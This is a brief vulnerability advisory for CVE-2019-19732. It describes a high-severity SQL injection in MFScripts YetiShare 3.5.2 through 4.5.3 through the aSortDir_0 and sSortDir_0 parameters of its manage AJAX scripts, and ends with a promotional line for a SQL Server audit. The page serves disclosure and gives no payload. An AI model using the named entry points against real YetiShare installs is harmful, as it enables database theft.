SQL Injection in MFScripts YetiShare 3.5.2 through 4.5.3 via translation_manage_text.ajax.php and *_manage.ajax.php

SQL Injection in MFScripts YetiShare 3.5.2 through 4.5.3 via translation_manage_text.ajax.php and *_manage.ajax.php

CVE-2019-19732 · HIGH Severity

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

translation_manage_text.ajax.php and various *_manage.ajax.php in MFScripts YetiShare 3.5.2 through 4.5.3 directly insert values from the aSortDir_0 and/or sSortDir_0 parameter into a SQL string. This allows an attacker to inject their own SQL and manipulate the query, typically extracting data from the database, aka SQL Injection.

Learn more about our Cis Benchmark Audit For Microsoft Sql Server.